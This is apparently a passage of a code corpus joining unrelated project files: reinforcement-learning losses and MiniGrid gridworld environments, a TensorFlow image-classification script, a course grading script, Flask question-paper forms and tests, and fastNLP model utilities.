losses = torch.where(abs_delta <= self.delta_clip, losses, b)
# if self.prioritized_replay:
# losses *= samples.is_weights
# sum losses over feature vector such that each sample has a scalar loss (result: B x 1)
# losses = losses.sum(dim=1)
td_abs_errors = abs_delta.mean(axis=1).detach()
if self.delta_clip is not None:
td_abs_errors = torch.clamp(td_abs_errors, 0, self.delta_clip)
if not self.mid_batch_reset:
losses = torch.mean(losses, axis=1)
valid = valid_from_done(samples.done)
loss = valid_mean(losses, valid)
td_abs_errors *= valid
else:
loss = torch.mean(losses)
return loss, td_abs_errors
```
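The time-contrastive feature loss in `LandmarkTCFDSR.feature_loss` above is a standard triplet margin loss over anchor/positive/negative embeddings. A minimal sketch with random tensors (an editor's illustration, not repository code) showing it matches PyTorch's built-in `nn.TripletMarginLoss` up to the tiny epsilon the built-in adds inside its distance computation:
```python
import torch
import torch.nn as nn

margin = 2.0
anchor, pos, neg = (torch.randn(8, 32) for _ in range(3))

pos_dist = torch.norm(anchor - pos, p=2, dim=1)
neg_dist = torch.norm(anchor - neg, p=2, dim=1)
manual = torch.clamp(margin + pos_dist - neg_dist, min=0.0).mean()

builtin = nn.TripletMarginLoss(margin=margin, p=2)(anchor, pos, neg)
print(manual.item(), builtin.item())  # nearly identical values
```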
#### File: rlpyt/envs/minigrid.py
```python
from gym_minigrid.minigrid import *
class FourRooms(MiniGridEnv):
"""
Classic 4 rooms gridworld environment.
    Agent and goal positions can be specified; if not, they are set at random.
"""
def __init__(self, start_pos=None, goal_pos=None, max_steps=100):
self._agent_default_pos = start_pos
self._goal_default_pos = goal_pos
self.start_pos = start_pos
self.goal_pos = goal_pos
super().__init__(grid_size=13, max_steps=max_steps)
def _gen_grid(self, width, height):
# Create the grid
self.grid = Grid(width, height)
# Generate the surrounding walls
self.grid.horz_wall(0, 0)
self.grid.horz_wall(0, height - 1)
self.grid.vert_wall(0, 0)
self.grid.vert_wall(width - 1, 0)
room_w = width // 2
room_h = height // 2
# For each row of rooms
for j in range(0, 2):
# For each column
for i in range(0, 2):
xL = i * room_w
yT = j * room_h
xR = xL + room_w
yB = yT + room_h
                # Right wall and door
if i + 1 < 2:
self.grid.vert_wall(xR, yT, room_h)
# pos = (xR, self._rand_int(yT + 1, yB))
# self.grid.set(*pos, None)
# Bottom wall and door
if j + 1 < 2:
if i == 1:
yB += 1
self.grid.horz_wall(xL, yB, room_w)
# pos = (self._rand_int(xL + 1, xR), yB)
# self.grid.set(*pos, None)
for pos in [(6, 3), (2, 6), (9, 7), (6, 10)]:
self.grid.set(*pos, None)
# Randomize the player start position and orientation
if self._agent_default_pos is not None:
self.agent_pos = self._agent_default_pos
self.grid.set(*self._agent_default_pos, None)
self.agent_dir = self._rand_int(0, 4) # assuming random start direction
else:
self.place_agent()
if self._goal_default_pos is not None:
goal = Goal()
self.put_obj(goal, *self._goal_default_pos)
goal.init_pos, goal.cur_pos = self._goal_default_pos
else:
self.place_obj(Goal())
self.mission = 'Reach the goal'
def step(self, action):
obs, reward, done, info = MiniGridEnv.step(self, action)
return obs, reward, done, info
class Room:
def __init__(self,
top,
size,
entryDoorPos,
exitDoorPos
):
self.top = top
self.size = size
self.entryDoorPos = entryDoorPos
self.exitDoorPos = exitDoorPos
class MultiRoom(MiniGridEnv):
"""
Environment with multiple rooms (subgoals)
"""
def __init__(self,
minNumRooms,
maxNumRooms,
maxRoomSize=10,
gridSize=25
):
assert minNumRooms > 0
assert maxNumRooms >= minNumRooms
assert maxRoomSize >= 4
self.minNumRooms = minNumRooms
self.maxNumRooms = maxNumRooms
self.maxRoomSize = maxRoomSize
self.rooms = []
super(MultiRoom, self).__init__(
grid_size=gridSize,
max_steps=self.maxNumRooms * 20
)
def _gen_grid(self, width, height):
roomList = []
# Choose a random number of rooms to generate
numRooms = self._rand_int(self.minNumRooms, self.maxNumRooms+1)
while len(roomList) < numRooms:
curRoomList = []
entryDoorPos = (
self._rand_int(0, width - 2),
self._rand_int(0, width - 2)
)
# Recursively place the rooms
self._placeRoom(
numRooms,
roomList=curRoomList,
minSz=4,
maxSz=self.maxRoomSize,
entryDoorWall=2,
entryDoorPos=entryDoorPos
)
if len(curRoomList) > len(roomList):
roomList = curRoomList
# Store the list of rooms in this environment
assert len(roomList) > 0
self.rooms = roomList
# Create the grid
self.grid = Grid(width, height)
wall = Wall()
prevDoorColor = None
# For each room
for idx, room in enumerate(roomList):
topX, topY = room.top
sizeX, sizeY = room.size
# Draw the top and bottom walls
for i in range(0, sizeX):
self.grid.set(topX + i, topY, wall)
self.grid.set(topX + i, topY + sizeY - 1, wall)
# Draw the left and right walls
for j in range(0, sizeY):
self.grid.set(topX, topY + j, wall)
self.grid.set(topX + sizeX - 1, topY + j, wall)
# If this isn't the first room, place the entry door
if idx > 0:
# Pick a door color different from the previous one
doorColors = set(COLOR_NAMES)
if prevDoorColor:
doorColors.remove(prevDoorColor)
                # Note: sorting here guarantees determinism; this is needed
                # because iteration order over a Python set is not deterministic
doorColor = self._rand_elem(sorted(doorColors))
entryDoor = Door(doorColor)
self.grid.set(*room.entryDoorPos, entryDoor)
prevDoorColor = doorColor
prevRoom = roomList[idx-1]
prevRoom.exitDoorPos = room.entryDoorPos
# Randomize the starting agent position and direction
self.place_agent(roomList[0].top, roomList[0].size)
# Place the final goal in the last room
self.goal_pos = self.place_obj(Goal(), roomList[-1].top, roomList[-1].size)
self.mission = 'traverse the rooms to get to the goal'
def _placeRoom(
self,
numLeft,
roomList,
minSz,
maxSz,
entryDoorWall,
entryDoorPos
):
# Choose the room size randomly
sizeX = self._rand_int(minSz, maxSz+1)
sizeY = self._rand_int(minSz, maxSz+1)
# The first room will be at the door position
if len(roomList) == 0:
topX, topY = entryDoorPos
# Entry on the right
elif entryDoorWall == 0:
topX = entryDoorPos[0] - sizeX + 1
y = entryDoorPos[1]
topY = self._rand_int(y - sizeY + 2, y)
# Entry wall on the south
elif entryDoorWall == 1:
x = entryDoorPos[0]
topX = self._rand_int(x - sizeX + 2, x)
topY = entryDoorPos[1] - sizeY + 1
# Entry wall on the left
elif entryDoorWall == 2:
topX = entryDoorPos[0]
y = entryDoorPos[1]
topY = self._rand_int(y - sizeY + 2, y)
# Entry wall on the top
elif entryDoorWall == 3:
x = entryDoorPos[0]
topX = self._rand_int(x - sizeX + 2, x)
topY = entryDoorPos[1]
else:
assert False, entryDoorWall
# If the room is out of the grid, can't place a room here
if topX < 0 or topY < 0:
return False
if topX + sizeX > self.width or topY + sizeY >= self.height:
return False
# If the room intersects with previous rooms, can't place it here
for room in roomList[:-1]:
nonOverlap = \
topX + sizeX < room.top[0] or \
room.top[0] + room.size[0] <= topX or \
topY + sizeY < room.top[1] or \
room.top[1] + room.size[1] <= topY
if not nonOverlap:
return False
# Add this room to the list
roomList.append(Room(
(topX, topY),
(sizeX, sizeY),
entryDoorPos,
None
))
# If this was the last room, stop
if numLeft == 1:
return True
# Try placing the next room
for i in range(0, 8):
# Pick which wall to place the out door on
wallSet = set((0, 1, 2, 3))
wallSet.remove(entryDoorWall)
exitDoorWall = self._rand_elem(sorted(wallSet))
nextEntryWall = (exitDoorWall + 2) % 4
# Pick the exit door position
# Exit on right wall
if exitDoorWall == 0:
exitDoorPos = (
topX + sizeX - 1,
topY + self._rand_int(1, sizeY - 1)
)
# Exit on south wall
elif exitDoorWall == 1:
exitDoorPos = (
topX + self._rand_int(1, sizeX - 1),
topY + sizeY - 1
)
# Exit on left wall
elif exitDoorWall == 2:
exitDoorPos = (
topX,
topY + self._rand_int(1, sizeY - 1)
)
# Exit on north wall
elif exitDoorWall == 3:
exitDoorPos = (
topX + self._rand_int(1, sizeX - 1),
topY
)
else:
assert False
# Recursively create the other rooms
success = self._placeRoom(
numLeft - 1,
roomList=roomList,
minSz=minSz,
maxSz=maxSz,
entryDoorWall=nextEntryWall,
entryDoorPos=exitDoorPos
)
if success:
break
return True
```
#### File: dqn/dsr/idf_model.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
from rlpyt.utils.tensor import infer_leading_dims, restore_leading_dims
from rlpyt.models.mlp import MlpModel
from rlpyt.models.utils import FUNCTION_MAP, Reshape
class IDFModel(torch.nn.Module):
def __init__(
self,
image_shape,
output_size,
feature_size=64
):
super().__init__()
h, w, c = image_shape
self.output_size = output_size
self.feature_size = feature_size
conv_embedding_size = 16 * (((h - 3) // 2) - 1) ** 2
self.encoder = nn.Sequential(
nn.Conv2d(c, 16, (3, 3), stride=2),
nn.ReLU(),
nn.Conv2d(16, 16, (3, 3), stride=1),
nn.ReLU(),
nn.Flatten(),
nn.Linear(conv_embedding_size, self.feature_size)
)
self.inverse = nn.Sequential(
nn.Linear(feature_size * 2, self.output_size)
)
def forward(self, obs, next_obs=None, mode='inverse'):
x = obs.type(torch.float)
if mode == 'inverse':
next_x = next_obs.type(torch.float)
return self.inverse(torch.cat((x, next_x), dim=1))
elif mode == 'encode':
x = x.permute(0, 3, 1, 2)
return self.encoder(x)
else:
raise ValueError('Invalid mode!')
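# --- Editor's usage sketch (hypothetical shapes, not part of the original file) ---
# Encode a small batch and predict the action between consecutive observations;
# the 7x7x3 observation shape and 4 actions are assumptions for illustration only.
if __name__ == '__main__':
    model = IDFModel(image_shape=(7, 7, 3), output_size=4)
    obs = torch.rand(5, 7, 7, 3)
    next_obs = torch.rand(5, 7, 7, 3)
    features = model(obs, mode='encode')                            # -> (5, 64)
    next_features = model(next_obs, mode='encode')                  # -> (5, 64)
    action_logits = model(features, next_features, mode='inverse')  # -> (5, 4)
    print(features.shape, action_logits.shape)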
``` |
{
"source": "2016gary/RealTimeIR",
"score": 3
} |
#### File: RealTimeIR/Python/predict.py
```python
from skimage import io, transform
import glob
import tensorflow as tf
import numpy as np
path = 'E:/RealTimeIR/predict/'
# Resize all images to 100*100
w = 100
h = 100
c = 3
# Read the images
def read_img(path):
imgs = []
for im in glob.glob(path + '*.jpg'):
img = io.imread(im)
img = transform.resize(img, (w, h, c), mode="reflect")
imgs.append(img)
return np.asarray(imgs, np.float32)
# Convert the images to be predicted into a dataset
x_train = read_img(path)
# ----------------- Use the same network as the trained model ----------------------
x = tf.placeholder(tf.float32, shape=[None, w, h, c], name='x')
# First convolutional layer (100->50)
# In TensorFlow, padding has two types, SAME and VALID: SAME pads with zeros so the spatial size stays the same, VALID does not pad
conv1 = tf.layers.conv2d(
inputs=x,
filters=32,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool1 = tf.layers.max_pooling2d(inputs=conv1, pool_size=[2, 2], strides=2)
# Second convolutional layer (50->25)
conv2 = tf.layers.conv2d(
inputs=pool1,
filters=64,
kernel_size=[5, 5],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool2 = tf.layers.max_pooling2d(inputs=conv2, pool_size=[2, 2], strides=2)
# Third convolutional layer (25->12)
conv3 = tf.layers.conv2d(
inputs=pool2,
filters=128,
kernel_size=[3, 3],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool3 = tf.layers.max_pooling2d(inputs=conv3, pool_size=[2, 2], strides=2)
# Fourth convolutional layer (12->6)
conv4 = tf.layers.conv2d(
inputs=pool3,
filters=128,
kernel_size=[3, 3],
padding="same",
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01))
pool4 = tf.layers.max_pooling2d(inputs=conv4, pool_size=[2, 2], strides=2)
re1 = tf.reshape(pool4, [-1, 6 * 6 * 128])
# Fully connected layers
dense1 = tf.layers.dense(inputs=re1,
units=1024,
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003))
dense2 = tf.layers.dense(inputs=dense1,
units=512,
activation=tf.nn.relu,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003))
# The final output layer uses 10 neurons, giving a 10-dimensional vector that corresponds to the 10 classes
logits = tf.layers.dense(inputs=dense2,
units=10,
activation=None,
kernel_initializer=tf.truncated_normal_initializer(stddev=0.01),
kernel_regularizer=tf.contrib.layers.l2_regularizer(0.003))
# --------------------------- End of network ---------------------------
sess = tf.InteractiveSession()
# Load the saved model into the current session
saver = tf.train.Saver()
saver.restore(sess, 'E:/RealTimeIR/model/10-image-set')
# Run prediction with the model
predictions = sess.run(tf.argmax(logits, 1), feed_dict={x: x_train})
# print("输出predictions:", predictions)
for predict in predictions:
    if predict == 0:
        result = "bicycle"
        print("Recognition result: bicycle")
    elif predict == 1:
        result = "book"
        print("Recognition result: book")
    elif predict == 2:
        result = "water bottle"
        print("Recognition result: water bottle")
    elif predict == 3:
        result = "car"
        print("Recognition result: car")
    elif predict == 4:
        result = "chair"
        print("Recognition result: chair")
    elif predict == 5:
        result = "computer"
        print("Recognition result: computer")
    elif predict == 6:
        result = "face"
        print("Recognition result: face")
    elif predict == 7:
        result = "shoe"
        print("Recognition result: shoe")
    elif predict == 8:
        result = "table"
        print("Recognition result: table")
    elif predict == 9:
        result = "tree"
        print("Recognition result: tree")
    else:
        result = "recognition error"
        print("Recognition error")
file_object = open('E:/RealTimeIR/result.txt', 'w+')
# Clear the file contents
file_object.truncate()
file_object.write(result)
file_object.close()
sess.close()
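# --- Editor's note (a sketch of an alternative, not in the original script) ---
# The long if/elif chain above could be replaced by a label lookup table, e.g.:
#   labels = ["bicycle", "book", "water bottle", "car", "chair",
#             "computer", "face", "shoe", "table", "tree"]
#   result = labels[predict] if 0 <= predict < len(labels) else "recognition error"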
``` |
{
"source": "2016-spring-csuf-benblazak-cpsc-121/course-materials",
"score": 2
} |
#### File: 2016-spring-csuf-benblazak-cpsc-121/course-materials/grades.py
```python
import os
import os.path
import requests
import sys
from collections import OrderedDict
import github3
import common
import standards
import students
# -----------------------------------------------------------------------------
class Error(Exception):
pass
class Namespace():
pass
# -----------------------------------------------------------------------------
def _gen_grades():
filedir = os.path.dirname(os.path.abspath(__file__))
if common.DEBUG: studentdir = './test/students'
else: studentdir = '../../../students'
studentdir = os.path.abspath(os.path.join(filedir, studentdir))
assignmentsfile = os.path.join(studentdir, 'assignments.gen.py')
scandir = os.path.join(studentdir, 'scans')
# .........................................................................
name2cwid = {
v['github'].lower():k
for k,v in students.students.items()
if 'github' in v
}
grades = {
cwid: OrderedDict( [
('extra credit', 0),
('overall', None),
('predictions', OrderedDict()),
] + [
((g,s,),OrderedDict())
for g,ss in standards.groups.items()
for s in ss
] )
for cwid in students.students
}
# .........................................................................
# from github
github = github3.GitHub()
try:
for r in sorted([ r.name for r in github.iter_user_repos(common.org) ]):
if r in ( 'course-materials', ): continue
assignment = 'a' + r[-2:]
for cwid in students.students:
grades[cwid][('assignment completion', '')][assignment] = None
for pr in github.iter_repo_issues(common.org, r, state='all'):
name = pr.user.login.lower()
if name not in name2cwid: continue
grades[name2cwid[name]] \
[('assignment completion', '')] \
[assignment] = True
with open(assignmentsfile, 'w') as f:
f.write(repr({
cwid: grades[cwid][('assignment completion', '')]
for cwid in grades
}))
except (requests.exceptions.ConnectionError, github3.models.GitHubError):
print('WARNING: taking assignment grades from file', file=sys.stderr)
assignments = eval(open(assignmentsfile).read())
none = OrderedDict([
(a, None) for a in assignments[list(assignments.keys())[0]]
])
for cwid in grades:
if cwid in assignments:
grades[cwid][('assignment completion', '')] = assignments[cwid]
else:
grades[cwid][('assignment completion', '')] = none
# .........................................................................
# from scans
for d in sorted(os.listdir(scandir)):
if d.startswith('.'): continue
i = Namespace()
(i.date, i.assessment, i.standards) = d.split(',', maxsplit=2)
i.standards = [ standards.lookup(s) for s in i.standards.split(',') ]
for cwid in students.students:
for sta in i.standards:
grades[cwid][sta][i.assessment] = None
for f in os.listdir(os.path.join(scandir, d)):
if f.startswith('.'): continue
if f.startswith('_'): continue
if ',' not in f:
raise Error(
'WARNING: no comma in'
+ ' "' + os.path.join(d, f) + '"' )
(i.name, i.scores) = \
f.split('.',maxsplit=1)[0].split(',', maxsplit=1)
if len(i.scores) != len(i.standards):
raise Error(
'WARNING: mismatch in number of scores for'
+ ' "' + os.path.join(d, f) + '"' )
i.scores = [
None if s == 'x' else
3.5 if s == '5' else
3.75 if s == '7' else
int(s)
for s in i.scores
]
for sta,sco in zip(i.standards,i.scores):
try:
grades[students.lookup(i.name)][sta][i.assessment] = sco
except students.Error:
raise Error(
'Name lookup failed for '
+ ' "' + os.path.join(d, f) + '"' )
# .........................................................................
# from file
private = common.importfile(os.path.join(studentdir, 'grades.py'))
for cwid in private.grades:
if cwid in grades: grades[cwid].update(private.grades[cwid])
else: grades[cwid] = private.grades[cwid]
# .........................................................................
for cwid in grades:
overall = 0
maximum = 0
for sta,assessments in grades[cwid].items():
if isinstance(sta, str): continue
scos = [ sco for sco in assessments.values() if sco is not None ]
if sta == ('assignment completion', ''):
sco = len(scos)/len(assessments) if len(assessments) > 0 else 0
assessments['overall'] = sco
overall += sco * standards.multipliers[sta]
maximum += standards.multipliers[sta]
continue
if len(scos) == 0:
assessments['overall'] = None
else:
if len(scos) == 1 or scos[-1] >= scos[-2]:
sco = scos[-1]
else: # scos[-1] < scos[-2]
sco = [ sco for sco in [1, 2, 3, 3.5, 3.75, 4]
if (scos[-1]+scos[-2])/2 <= sco ][0]
assessments['overall'] = sco
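            # Editor's note (not in the original source): this implements the
            # reassessment rule -- keep the newest score if it did not drop;
            # otherwise round the average of the last two scores up to the next
            # value in [1, 2, 3, 3.5, 3.75, 4]. E.g. scores of 4 then 3 average
            # to 3.5, so the recorded overall becomes 3.5.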
if sco >= 3:
overall += sco / 4 * standards.multipliers[sta]
maximum += standards.multipliers[sta]
ec = grades[cwid]['extra credit'] * 0.002
if grades[cwid]['overall'] is None:
grades[cwid]['overall'] = overall + ec
grades[cwid]['predictions']['current grade'] = grades[cwid]['overall']
if maximum == 0:
grades[cwid]['predictions']['average'] = None
grades[cwid]['predictions']['maximum without reassessing'] = None
else:
grades[cwid]['predictions']['average'] = overall / maximum
grades[cwid]['predictions']['maximum without reassessing'] = \
1 - maximum + overall + ec
# .........................................................................
return grades
# -----------------------------------------------------------------------------
grades = _gen_grades()
# -----------------------------------------------------------------------------
# SECTION BEGIN letter
def letter(percent):
if percent >= 97: return 'A+'
elif percent >= 93: return 'A'
elif percent >= 90: return 'A-'
elif percent >= 87: return 'B+'
elif percent >= 83: return 'B'
elif percent >= 80: return 'B-'
elif percent >= 77: return 'C+'
elif percent >= 70: return 'C'
elif percent >= 50: return 'D'
else : return 'F'
# SECTION END letter
``` |
{
"source": "201701203/question-paper-generator",
"score": 3
} |
#### File: blueprints/courses/forms.py
```python
from flask_login import current_user
from flask_wtf import FlaskForm
from sqlalchemy import and_
from sqlalchemy import func
from sqlalchemy.sql import label
from wtforms import BooleanField
from wtforms import IntegerField
from wtforms import StringField
from wtforms import SubmitField
from wtforms.validators import DataRequired
from wtforms.validators import NumberRange
from wtforms.validators import ValidationError
from flaskapp import db
from flaskapp.models import Course
from flaskapp.models import Unit
def validate_course_name(form, course_name):
"""Validation of course name
Args:
form (FlaskForm): In which given description about course
course_name (StringField): Name of course
Raises:
ValidationError: If already exist then error of That Course is already exist. Please choose a different one. else add the course
"""
course = Course.query.filter(
and_(Course.name == course_name.data,
Course.teacher == current_user)).first()
if course:
raise ValidationError(
"That Course is already exist. Please choose a different one.")
def validate_unit_name(form, unit_name):
"""Validation on unit name of the course
Args:
form (FlaskForm): Form i which all the details of unit
unit_name (StringField): Name of unit that user want to add
Raises:
ValidationError: If already there then give error of That Unit is already exist. Please choose a different one. else add name of unit
"""
unit = Unit.query.filter(
and_(Unit.name == unit_name.data, Unit.course == form.course)).first()
if unit:
raise ValidationError(
"That Unit is already exist. Please choose a different one.")
def validate_chapter_no(form, chapter_no):
unit = Unit.query.filter(
and_(Unit.chapter_no == chapter_no.data,
Unit.course == form.course)).first()
if unit:
raise ValidationError(
"That Unit is already exist. Please choose a different one.")
units = Unit.query.filter(Unit.course == form.course).all()
if units:
max_chapter_no = max(map(lambda _unit: int(_unit.chapter_no), units))
if max_chapter_no and (max_chapter_no - chapter_no.data) < -1:
raise ValidationError(
f"Please crete unit:{max_chapter_no + 1} first.")
class CourseForm(FlaskForm):
course = StringField("Course",
validators=[DataRequired(), validate_course_name])
include_asked = BooleanField("Should paper include asked questions?")
submit = SubmitField("submit")
class UnitForm(FlaskForm):
chapter_no = IntegerField(
"Chapter No.",
validators=[
DataRequired(),
NumberRange(1, 101, "Units can't be more than 100"),
validate_chapter_no,
],
)
name = StringField("Name", validators=[DataRequired(), validate_unit_name])
submit = SubmitField("submit")
def __init__(self, course):
self.course = course
super().__init__()
```
#### File: test/papers/test_paper_generate_request.py
```python
from flask import json
from flaskapp.models import Paper
from test.main.base_classes import BaseMCQQuestion
from test.main.base_classes import BaseSubQuestion
from test.main.utils import test_post_request
class PaperGenerateRequest(BaseSubQuestion, BaseMCQQuestion):
def test_paper_generate_request(self):
data = dict(questions=[1, 2, 3], total_marks=30)
response = self.client.post(
"/course/1/papers/generate/request",
data=json.dumps(data),
headers={"Content-Type": "application/json"},
)
self.assertIn(
(b"You should be redirected automatically to target URL: "
b"<a href=/course/1/papers/generate/form/ >"),
response.data,
)
def test_handle_conflicting_questions(self):
data = dict(mcq={
"ask": [1, 3],
"nask": [2, 4]
},
sub={
"ask": [1, 3],
"nask": [2, 4]
})
response = self.client.post(
"/papers/handle/conflicts",
data=json.dumps(data),
headers={"Content-Type": "application/json"},
)
data1 = json.loads(response.get_data(as_text=True))
self.assertEqual(data1["status"], "OK")
def test_mark_distribution_form(self):
self.test_paper_generate_request()
data = {
"Unit:01": "30",
"Knowledge": "10",
"Comprehension": "10",
"Application": "10",
"Easy": "10",
"Medium": "10",
"Hard": "10",
"Que.1.A": "5",
"Que.2.A": "5",
"Que.2.B": "5",
"Que.3.A": "5",
"Que.3.B": "5",
"Que.3.C": "5",
"sub": 15,
"mcq": 15,
}
response, _ = test_post_request(self,
"/course/1/papers/generate/form/",
data)
self.assertIn(b"<title>Mark Distribution</title>", response.data)
response = self.client.post(
"/course/1/papers/confirm/template/",
data=json.dumps(dict(status="OK")),
headers={"Content-Type": "application/json"},
)
self.assertIn(
(b"You should be redirected automatically to target URL: "
b"<a href=/course/1/papers/generate/ >"),
response.data,
)
def test_generate_and_confirm_paper(self):
self.test_paper_generate_request()
self.test_mark_distribution_form()
data = {
"name": "paper1",
"term": "winter",
"exam_date": "2020-10-15",
"time_limit": "2",
}
test_post_request(self, "/course/1/papers/generate/", data, Paper, 1)
# testing gerenated paper
with self.mail.record_messages() as outbox:
data = {"generate": "YES", "examiner_email": "<EMAIL>"}
test_post_request(self, "papers/confirm/1", data=data)
self.assertEqual(1, len(outbox))
self.assertEqual("Paper for paper1", outbox[0].subject)
def test_pdf_paper(self):
self.test_paper_generate_request()
self.test_mark_distribution_form()
self.test_generate_and_confirm_paper()
response = self.client.get('/papers/1')
self.assertIn(b"Answer the following Multiple choice questions", response.data)
``` |
{
"source": "2017alan/fastNLP",
"score": 3
} |
#### File: fastNLP/core/loss.py
```python
import torch
class Loss(object):
"""Loss function of the algorithm,
either the wrapper of a loss function from framework, or a user-defined loss (need pytorch auto_grad support)
"""
def __init__(self, args):
"""
:param args: None or str, the name of a loss function.
"""
if args is None:
# this is useful when Trainer.__init__ performs type check
self._loss = None
elif isinstance(args, str):
self._loss = self._borrow_from_pytorch(args)
else:
raise NotImplementedError
def get(self):
"""
:return self._loss: the loss function
"""
return self._loss
@staticmethod
def _borrow_from_pytorch(loss_name):
"""Given a name of a loss function, return it from PyTorch.
:param loss_name: str, the name of a loss function
:return loss: a PyTorch loss
"""
if loss_name == "cross_entropy":
return torch.nn.CrossEntropyLoss()
elif loss_name == 'nll':
return torch.nn.NLLLoss()
else:
raise NotImplementedError
```
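A usage sketch for the `Loss` wrapper above (an editor's illustration; the import path is inferred from the file location and may differ):
```python
from fastNLP.core.loss import Loss  # hypothetical import path

loss_fn = Loss("cross_entropy").get()  # a torch.nn.CrossEntropyLoss instance
nll_fn = Loss("nll").get()             # a torch.nn.NLLLoss instance
```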
#### File: fastNLP/modules/utils.py
```python
from collections import defaultdict
import numpy as np
import torch
import torch.nn.init as init
import torch.nn as nn
def mask_softmax(matrix, mask):
if mask is None:
result = torch.nn.functional.softmax(matrix, dim=-1)
else:
raise NotImplementedError
return result
def initial_parameter(net, initial_method=None):
if initial_method == 'xavier_uniform':
init_method = init.xavier_uniform_
elif initial_method=='xavier_normal':
init_method = init.xavier_normal_
    elif initial_method == 'kaiming_normal' or initial_method == 'msra':
        init_method = init.kaiming_normal_
    elif initial_method == 'kaiming_uniform':
        init_method = init.kaiming_uniform_
elif initial_method == 'orthogonal':
init_method = init.orthogonal_
elif initial_method == 'sparse':
init_method = init.sparse_
elif initial_method =='normal':
init_method = init.normal_
    elif initial_method == 'uniform':
        init_method = init.uniform_
else:
init_method = init.xavier_normal_
def weights_init(m):
# classname = m.__class__.__name__
if isinstance(m, nn.Conv2d) or isinstance(m,nn.Conv1d) or isinstance(m,nn.Conv3d): # for all the cnn
if initial_method != None:
init_method(m.weight.data)
else:
init.xavier_normal_(m.weight.data)
init.normal_(m.bias.data)
elif isinstance(m, nn.LSTM):
for w in m.parameters():
if len(w.data.size())>1:
init_method(w.data) # weight
else:
init.normal_(w.data) # bias
elif hasattr(m, 'weight') and m.weight.requires_grad:
init_method(m.weight.data)
else:
for w in m.parameters() :
if w.requires_grad:
if len(w.data.size())>1:
init_method(w.data) # weight
else:
init.normal_(w.data) # bias
# print("init else")
net.apply(weights_init)
def seq_mask(seq_len, max_len):
mask = [torch.ge(torch.LongTensor(seq_len), i + 1) for i in range(max_len)]
mask = torch.stack(mask, 1)
return mask
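# Example (editor's note, not in the original source): seq_mask([2, 3], 4) stacks the
# per-position comparisons into
#   [[1, 1, 0, 0],
#    [1, 1, 1, 0]]
# i.e. a (batch, max_len) mask that is 1 up to each sequence's length.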
"""
Codes from FudanParser. Not tested. Do not use !!!
"""
def expand_gt(gt):
"""expand_gt: Expand ground truth to matrix
Arguments:
gt: tensor of (n, l)
Return:
        f: ground truth tensor of shape (n, l, l); $gt[i][j] = k$ leads to $f[i][j][k] = 1$.
"""
n, l = gt.shape
ret = torch.zeros(n, l, l).long()
for i in range(n):
ret[i][torch.arange(l).long(), gt[i]] = 1
return ret
def greedy_decoding(arc_f):
"""greedy_decoding
Arguments:
arc_f: a tensor in shape of (n, l+1, l+1)
length of the sentence is l and index 0 is <root>
Output:
arc_pred: a tensor in shape of (n, l), indicating the head words
"""
f_arc = arc_f[:, 1:, :] # ignore the root
_, arc_pred = torch.max(f_arc.data, dim=-1, keepdim=False)
return arc_pred
def mst_decoding(arc_f):
batch_size = arc_f.shape[0]
length = arc_f.shape[1]
arc_score = arc_f.data.cpu()
pred_collection = []
for i in range(batch_size):
head = mst(arc_score[i].numpy())
pred_collection.append(head[1:].reshape((1, length - 1)))
arc_pred = torch.LongTensor(np.concatenate(pred_collection, axis=0)).type_as(arc_f).long()
return arc_pred
def outer_product(features):
"""InterProduct: Get inter sequence product of features
Arguments:
features: feature vectors of sequence in the shape of (n, l, h)
Return:
f: product result in (n, l, l, h) shape
"""
n, l, c = features.shape
features = features.contiguous()
x = features.view(n, l, 1, c)
x = x.expand(n, l, l, c)
y = features.view(n, 1, l, c).contiguous()
y = y.expand(n, l, l, c)
return x * y
def outer_concat(features):
"""InterProduct: Get inter sequence concatenation of features
Arguments:
features: feature vectors of sequence in the shape of (n, l, h)
Return:
f: product result in (n, l, l, h) shape
"""
n, l, c = features.shape
x = features.contiguous().view(n, l, 1, c)
x = x.expand(n, l, l, c)
y = features.view(n, 1, l, c)
y = y.expand(n, l, l, c)
return torch.cat((x, y), dim=3)
def mst(scores):
"""
https://github.com/tdozat/Parser/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/models/nn.py#L692 # NOQA
"""
length = scores.shape[0]
min_score = scores.min() - 1
eye = np.eye(length)
scores = scores * (1 - eye) + min_score * eye
heads = np.argmax(scores, axis=1)
heads[0] = 0
tokens = np.arange(1, length)
roots = np.where(heads[tokens] == 0)[0] + 1
if len(roots) < 1:
root_scores = scores[tokens, 0]
head_scores = scores[tokens, heads[tokens]]
new_root = tokens[np.argmax(root_scores / head_scores)]
heads[new_root] = 0
elif len(roots) > 1:
root_scores = scores[roots, 0]
scores[roots, 0] = 0
new_heads = np.argmax(scores[roots][:, tokens], axis=1) + 1
new_root = roots[np.argmin(
scores[roots, new_heads] / root_scores)]
heads[roots] = new_heads
heads[new_root] = 0
edges = defaultdict(set)
vertices = set((0,))
for dep, head in enumerate(heads[tokens]):
vertices.add(dep + 1)
edges[head].add(dep + 1)
for cycle in _find_cycle(vertices, edges):
dependents = set()
to_visit = set(cycle)
while len(to_visit) > 0:
node = to_visit.pop()
if node not in dependents:
dependents.add(node)
to_visit.update(edges[node])
cycle = np.array(list(cycle))
old_heads = heads[cycle]
old_scores = scores[cycle, old_heads]
non_heads = np.array(list(dependents))
scores[np.repeat(cycle, len(non_heads)),
np.repeat([non_heads], len(cycle), axis=0).flatten()] = min_score
new_heads = np.argmax(scores[cycle][:, tokens], axis=1) + 1
new_scores = scores[cycle, new_heads] / old_scores
change = np.argmax(new_scores)
changed_cycle = cycle[change]
old_head = old_heads[change]
new_head = new_heads[change]
heads[changed_cycle] = new_head
edges[new_head].add(changed_cycle)
edges[old_head].remove(changed_cycle)
return heads
def _find_cycle(vertices, edges):
"""
https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm # NOQA
https://github.com/tdozat/Parser/blob/0739216129cd39d69997d28cbc4133b360ea3934/lib/etc/tarjan.py # NOQA
"""
